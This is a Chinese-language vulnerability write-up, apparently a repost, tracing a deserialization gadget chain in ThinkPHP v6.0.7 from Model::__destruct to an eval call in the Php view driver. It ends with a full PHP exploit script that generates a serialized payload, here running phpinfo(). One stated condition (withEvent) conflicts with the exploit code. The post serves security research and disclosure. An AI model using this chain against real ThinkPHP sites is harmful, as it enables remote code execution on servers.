ThinkPHP v6.0.7 eval反序列化利用链

gclome

原文链接：ThinkPHP v6.0.7 eval反序列化利用链

0x00 前言
最近分析了不少的 ThinkPHP v6.0.x 反序列化链条，发现还蛮有意思的，但美中不足的是无法拥有直接调用形如 eval 的能力。于是就自己就在最新的(目前是 ThinkPHP v6.0.7)版本上基于原有的反序列化链，再挖了一条能够执行 eval 的。

---

0X01 利用条件

• 存在一个完全可控的反序列化点。
  
  

0x02 环境配置直接使用 composer 安装 V6.0.7 版本的即可。

1. ​-> composer create-project topthink/think=6.0.7 tp607
   
2. -> cd tp607
   
3. -> php think run
   
4. ​

复制代码

​修改入口 app/controller/Index.php 内容，创造一个可控反序列化点：

​

0x03 链条分析这里还是由 ThinkPHP v6.0.x 的入口进入。
在 Model 类 (vendor/topthink/think-orm/src/Model.php) 存在一个 __destuct 魔法方法。当然 Model 这玩意是个抽象类，得从它的 继承类 入手，也就是 Pivot 类 (vendor/topthink/tink-orm/src/model/Pivot.php ) 。
​

1. abstract class Model implements JsonSerializable, ArrayAccess, Arrayable, Jsonable
   
2. {
   
3.     /**
   
4.      * ......
   
5.      */
   
6. 
   
7.     public function __destruct()
   
8.     {
   
9.         if ($this->lazySave) {
   
10.             $this->save();
    
11.         }
    
12.     }
    
13. }
    
14. 
    
15. class Pivot extends Model
    
16. {
    
17.     /**
    
18.     * ......
    
19.     */
    
20. }

复制代码

我们先让 $this->lazySave = true ，从而跟进 $this->save() 方法。

1. // abstract class Model implements JsonSerializable, ArrayAccess, Arrayable, Jsonable{}
   
2. 
   
3. public function save(array $data = [], string $sequence = null): bool
   
4. {
   
5.         // 数据对象赋值
   
6.     $this->setAttrs($data);
   
7. 
   
8.     if ($this->isEmpty() || false === $this->trigger('BeforeWrite')) {
   
9. 
   
10.         return false;
    
11. 
    
12.     }
    
13.     $result = $this->exists ? $this->updateData() : $this->insertData($sequence);
    
14. 
    
15.      /**
    
16.      * ......
    
17.      */
    
18. 
    
19. }

复制代码

其中 $this->setAttrs($data) 这个语句无伤大雅，跟进去可以发现甚至可以说啥事也没做。

1. // abstract class Model implements JsonSerializable, ArrayAccess, Arrayable, Jsonable{}
   
2. 
   
3. public function setAttrs(array $data): void
   
4. {
   
5.         // 进行数据处理
   
6.     foreach ($data as $key => $value) {
   
7.         $this->setAttr($key, $value, $data);
   
8.     }
   
9. }

复制代码

那么我们这里还需要依次绕过 if ($this->isEmpty() || false === $this->trigger('BeforeWrite')) 中的两个条件。跟进 $this->isEmpty() 以及 $this->trigger('BeforeWrite') ，我们发现 $this->data 要求不为 null ，且 $this->withEvent == true 。

1. // abstract class Model implements JsonSerializable, ArrayAccess, Arrayable, Jsonable{}
   
2. 
   
3. public function isEmpty(): bool
   
4. {
   
5.     return empty($this->data);
   
6. }
   
7. 
   
8. // trait ModelEvent{}
   
9. 
   
10. protected function trigger(string $event): bool
    
11. {
    
12.     if (!$this->withEvent) {
    
13.         return true;
    
14.     }
    
15. 
    
16.     /**
    
17.     * ......
    
18.     */
    
19. 
    
20. }

复制代码

此时， $this->isEmpty() 返回 false ，$this->trigger('BeforeWrite') 返回 true 。我们顺利进入下一步 $result = $this->exists ? $this->updateData() : $this->insertData($sequence); 。我们在上边可以发现 $this->exists 的默认值为 false ，不妨直接跟进 $this->insertData($sequence) ，其中 sequence = null。

1. // abstract class Model implements JsonSerializable, ArrayAccess, Arrayable, Jsonable{}
   
2. 
   
3. protected $exists = false;
   
4. 
   
5. protected function insertData(string $sequence = null): bool
   
6. {
   
7.     if (false === $this->trigger('BeforeInsert')) {
   
8.         return false;
   
9.     }
   
10. 
    
11.     $this->checkData();
    
12.     $data = $this->writeDataType($this->data);
    
13. 
    
14.     // 时间戳自动写入
    
15.     if ($this->autoWriteTimestamp) {
    
16.         /**
    
17.         * ......
    
18.         */
    
19.     }
    
20.     // 检查允许字段
    
21.     $allowFields = $this->checkAllowFields();
    
22. 
    
23.     /**
    
24.     * ......
    
25.     */
    
26. 
    
27. }

复制代码

显然，$this->trigger('BeforeInsert') 的值在上边已经被我们构造成了 true 了，这里继续跟进 $this->checkData() 以及 $data = $this->writeDataType($this->data) 。$this->checkData() 直接可以略过，而传入 $this->writeDataType() 的参数 $this->data 在上边已经被我们构造成一个 非null 的值，这里不妨将其构造成 [7] ，由于 $this->type 的值默认为 [] ，这里的遍历是没有影响的。

1. trait Attribute
   
2. {
   
3.     protected $type = [];
   
4. }
   
5. 
   
6. // abstract class Model implements JsonSerializable, ArrayAccess, Arrayable, Jsonable{}
   
7. protected function checkData(): void
   
8. {
   
9. }
   
10. 
    
11. protected function writeDataType(array $data): array
    
12. {
    
13.     foreach ($data as $name => &$value) {
    
14.         if (isset($this->type[$name])) {
    
15.             // 类型转换
    
16.             $value = $this->writeTransform($value, $this->type[$name]);
    
17.         }
    
18.     }
    
19.     return $data;
    
20. }
    
21. 
    
22. 至于 $this->autoWriteTimestamp 的默认值是没有的，相当于 null ，这里直接用 弱类型比较 直接略过。
    
23. 
    
24. trait TimeStamp
    
25. {
    
26.     protected $autoWriteTimestamp;
    
27. }
    

复制代码

此时，我们来到 $allowFields = $this->checkAllowFields() ，其中 $this->field 和 $this->schema 的默认值都为 [] ，因而可以直接来到 else{。

1. trait Attribute
   
2. {
   
3.     protected $schema = [];
   
4.     protected $field = [];
   
5. }
   
6. 
   
7. // abstract class Model implements JsonSerializable, ArrayAccess, Arrayable, Jsonable{}
   
8. 
   
9. protected function checkAllowFields(): array
   
10. {
    
11.     // 检测字段
    
12.     if (empty($this->field)) {
    
13.         if (!empty($this->schema)) {
    
14.             $this->field = array_keys(array_merge($this->schema, $this->jsonType));
    
15.         } else {
    
16.             $query = $this->db();
    
17.             $table = $this->table ? $this->table . $this->suffix : $query->getTable();
    
18.             $this->field = $query->getConnection()->getTableFields($table);
    
19.         }
    
20.         return $this->field;
    
21.     }
    
22. 
    
23.     /**
    
24.     * ......
    
25.     */
    
26. 
    
27. }

复制代码

​ 那么，继续跟进 $this->db ，来到了 关键点 ，第一句 $query = ... 可以直接跳过，而在 $query->table($this->table . $this->suffix) 这里存在熟悉的字符拼接。这样只需要让 $this->table 或 $this->suffix 为一个 类 就可以触发那个 类 的 __toString 魔法方法了。

1. // abstract class Model implements JsonSerializable, ArrayAccess, Arrayable, Jsonable{}
   
2. 
   
3. public function db($scope = []): Query
   
4. {
   
5.     /** @var Query $query */
   
6.     $query = self::$db->connect($this->connection)->name($this->name . $this->suffix)->pk($this->pk);
   
7.     if (!empty($this->table)) {
   
8.         $query->table($this->table . $this->suffix);
   
9.     }
   
10. 
    
11.     /**
    
12.     * ......
    
13.     */
    
14. 
    
15. }

复制代码

简单总结一下，要触发 __toString 需要构造：

•         $this->lazySave = true
  
•         $this->data = [7]
  
•         $this->withEvent = true
  
  

至于 __toSring 魔法方法的类，我们这里选择 Url 类 (vendor/topthink/framework/src/think/route/Url.php) ，首先第一个条件 if (0 === strpos($url, '[') && $pos = strpos($url, ']')) 需要绕过，第二个条件 if (false === strpos($url, '://') && 0 !== strpos($url, '/')) 需要满足最上部分，并使得 $url 的值为 ''。

1. class Url
   
2. {
   
3. 
   
4.     public function __toString()
   
5.     {
   
6. 
   
7.         return $this->build();
   
8.     }
   
9. 
   
10.     public function build()
    
11.     {
    
12.         // 解析URL
    
13.         $url     = $this->url;
    
14.         $suffix  = $this->suffix;
    
15.         $domain  = $this->domain;
    
16.         $request = $this->app->request;
    
17.         $vars    = $this->vars;
    
18. 
    
19.         if (0 === strpos($url, '[') && $pos = strpos($url, ']')) {
    
20.             // [name] 表示使用路由命名标识生成URL
    
21.             $name = substr($url, 1, $pos - 1);
    
22.             $url  = 'name' . substr($url, $pos + 1);
    
23.         }
    
24. 
    
25.         if (false === strpos($url, '://') && 0 !== strpos($url, '/')) {
    
26.             $info = parse_url($url);
    
27.             $url  = !empty($info['path']) ? $info['path'] : '';
    
28. 
    
29.             if (isset($info['fragment'])) {
    
30.                 // 解析锚点
    
31.                 $anchor = $info['fragment'];
    
32.                 if (false !== strpos($anchor, '?')) {
    
33.                     // 解析参数
    
34.                     [$anchor, $info['query']] = explode('?', $anchor, 2);
    
35.                 }
    
36.                 if (false !== strpos($anchor, '@')) {
    
37.                     // 解析域名
    
38.                     [$anchor, $domain] = explode('@', $anchor, 2);
    
39.                 }
    
40.             } elseif (strpos($url, '@') && false === strpos($url, '\\')) {
    
41.                 // 解析域名
    
42.                 [$url, $domain] = explode('@', $url, 2);
    
43.             }
    
44.         }
    
45. 
    
46.         if ($url) {
    
47. 
    
48.              /**
    
49.             * ......
    
50.             */
    
51. 
    
52.             $rule = $this->route->getName($checkName, $checkDomain);
    
53. 
    
54.             /**
    
55.             * ......
    
56.             */
    
57. 
    
58.         }
    
59. 
    
60.         if (!empty($rule) && $match = $this->getRuleUrl($rule, $vars, $domain)) {
    
61.             // 匹配路由命名标识
    
62.             $url = $match[0];
    
63. 
    
64.             if ($domain && !empty($match[1])) {
    
65.                 $domain = $match[1];
    
66.             }
    
67. 
    
68.             if (!is_null($match[2])) {
    
69.                 $suffix = $match[2];
    
70.             }
    
71.         } elseif (!empty($rule) && isset($name)) {
    
72.             throw new \InvalidArgumentException('route name not exists:' . $name);
    
73.         } else {
    
74.             // 检测URL绑定
    
75.             $bind = $this->route->getDomainBind($domain && is_string($domain) ? $domain : null);
    
76.              /**
    
77.             * ......
    
78.             */
    
79.         }
    
80. 
    
81.          /**
    
82.         * ......
    
83.         */
    
84.     }
    
85. }

复制代码

我们先让让 $this->url 构造成 a: ，此时 $url 的值也就为 ''，后边的各种条件也不会成立，可以直接跳过 。
然后再看 if($url) ，由于 弱类型 比较直接略过。
此时由于 $rule 是在 if($url){ 条件内被赋值，那么 if (!empty($rule) && $match = $this->getRuleUrl($rule, $vars, $domain)) 以及 elseif (!empty($rule) && isset($name)) 这两个也不会成立，直接略过。
此时，我们来到 else{ 内，其中 $bind = $this->route->getDomainBind($domain && is_string($domain) ? $domain : null) 这个代码为点睛之笔。显然，$this->route 是可控的，$domain 变量的值实际上就是 $this->domain ，也是一个可控的字符型变量，我们现在就能得到了一个 [可控类] -> getDomainBind([可控字符串]) 的调用形式。
总结来说，满足该调用形式需要构造：

•         $this->url = 'a:'
  
•         $this->app = 给个public的request属性的任意类
  
  

然后全局搜索 __call 魔法方法，在 Validate 类 (vendor/topthink/framework/src/think/Validate.php) 中存在一个可以称为 “简直为此量身定做” 的形式。

1. // class Str{}
   
2. 
   
3. public static function studly(string $value): string
   
4. {
   
5.     $key = $value;
   
6.     if (isset(static::$studlyCache[$key])) {
   
7.         return static::$studlyCache[$key];
   
8.     }
   
9.     $value = ucwords(str_replace(['-', '_'], ' ', $value));
   
10.     return static::$studlyCache[$key] = str_replace(' ', '', $value);
    
11. }
    
12. 
    
13. public static function camel(string $value): string
    
14. {
    
15.     if (isset(static::$camelCache[$value])) {
    
16.         return static::$camelCache[$value];
    
17.     }
    
18.     return static::$camelCache[$value] = lcfirst(static::studly($value));
    
19. }
    
20. 
    
21. // class Validate{}
    
22. 
    
23. class Validate
    
24. {
    
25.     public function is($value, string $rule, array $data = []): bool
    
26.     {
    
27.         switch (Str::camel($rule)) {
    
28.             case 'require':
    
29.                 // 必须
    
30.                 $result = !empty($value) || '0' == $value;
    
31.                 break;
    
32.             /**
    
33.             * ......
    
34.             */
    
35.                 break;
    
36.             case 'token':
    
37.                 $result = $this->token($value, '__token__', $data);
    
38.                 break;
    
39.             default:
    
40.                 if (isset($this->type[$rule])) {
    
41.                     // 注册的验证规则
    
42.                     $result = call_user_func_array($this->type[$rule], [$value]);
    
43.                 } elseif (function_exists('ctype_' . $rule)) {
    
44.                     /**
    
45.                     * ......
    
46.                     */
    
47.         }
    
48. 
    
49.         return $result;
    
50.     }
    
51. 
    
52.     public function __call($method, $args)
    
53.     {
    
54.         if ('is' == strtolower(substr($method, 0, 2))) {
    
55.             $method = substr($method, 2);
    
56.         }
    
57. 
    
58.         array_push($args, lcfirst($method));
    
59. 
    
60.         return call_user_func_array([$this, 'is'], $args);
    
61.     }
    
62. }

复制代码

这里先从 __call 看起，显然在调用 call_user_func_array 函数时，相当于 $this->is([$domain,'getDomainBind']) ，其中 $domain 是可控的。
跟进 $this->is 方法， $rule 变量的值即为 getDomainBind， Str::camel($rule) 的意思实际上是将 $rule = 'getDomainBind' 的 - 和 _ 替换成 '' ， 并将每个单词首字母大写存入 static:studlyCache['getDomainBind'] 中，然后回头先将首字母小写后赋值给 camel 方法的 static:cameCache['getDomainBind'] ，即返回值为 getDomainBind 。
由于 switch{ 没有一个符合 getDomainBind 的 case 值，我们可以直接看 default 的内容。 $this->type[$rule] 相当于 $this->type['getDomainBind'] ，是可控的，而 $value 值即是上边的 $domain 也是可控的，我们现在就能得到了一个 call_user_func_array([可控变量],[[可控变量]]) 的形式了。
实际上现在也就可以进行传入 单参数 的函数调用，可这并不够！！！我们来到 Php 类 (vendor/topthink/framework/src/think/view/driver/Php.php) 中，这里存在一个调用 eval 的且可传 单参数 的方法 display 。

1. class Php implements TemplateHandlerInterface
   
2. {
   
3.     public function display(string $content, array $data = []): void
   
4.     {
   
5.         $this->content = $content;
   
6.         extract($data, EXTR_OVERWRITE);
   
7.         eval('?>' . $this->content);
   
8.     }
   
9. 
   
10. }

复制代码

假若用上边的 call_user_func_array([可控变量],[[可控变量]]) 形式，构造出 call_user_func_array(['Php类','display'],['<?php (任意代码) ?>']) 即可执行 eval 了。
总的来说，我们只需要构造如下：

•         $this->type = ["getDomainBind" => [Php类,'display']]
  
  

就可以了。
0x04 简单示图

•         构造并触发 __toString ：
                         
  ​
         
  
•         构造 [可控类] -> getDomainBind([可控字符串]) 进入 __call：
                         
  ​
         
  
•         构造 call_user_func_array([可控变量],[[可控变量]]) 执行 eval：
                         
  ​
         
  
  

0x05 EXP

1. <?php
   
2. namespace think\model\concern{
   
3.     trait Attribute{
   
4.         private $data = [7];
   
5.     }
   
6. }
   
7. 
   
8. namespace think\view\driver{
   
9.     class Php{}
   
10. }
    
11. 
    
12. namespace think{
    
13.     abstract class Model{
    
14.         use model\concern\Attribute;
    
15.         private $lazySave;
    
16.         protected $withEvent;
    
17.         protected $table;
    
18.         function __construct($cmd){
    
19.             $this->lazySave = true;
    
20.             $this->withEvent = false;
    
21.             $this->table = new route\Url(new Middleware,new Validate,$cmd);
    
22.         }
    
23.     }
    
24.     class Middleware{
    
25.         public $request = 2333;
    
26.     }
    
27.     class Validate{
    
28.         protected $type;
    
29.         function __construct(){
    
30.              $this->type = [
    
31.                 "getDomainBind" => [new view\driver\Php,'display']
    
32.             ];
    
33.         }
    
34.     }
    
35. }
    
36. 
    
37. namespace think\model{
    
38.     use think\Model;
    
39.     class Pivot extends Model{}
    
40. }
    
41. 
    
42. namespace think\route{
    
43.     class Url
    
44.     {
    
45.         protected $url = 'a:';
    
46.         protected $domain;
    
47.         protected $app;
    
48.         protected $route;
    
49.         function __construct($app,$route,$cmd){
    
50.             $this->domain = $cmd;
    
51.             $this->app = $app;
    
52.             $this->route = $route;
    
53.         }
    
54.     }
    
55. }
    
56. 
    
57. namespace{
    
58.     echo base64_encode(serialize(new think\Model\Pivot('<?php phpinfo(); exit(); ?>')));
    
59. }

复制代码

利用结果：

​

​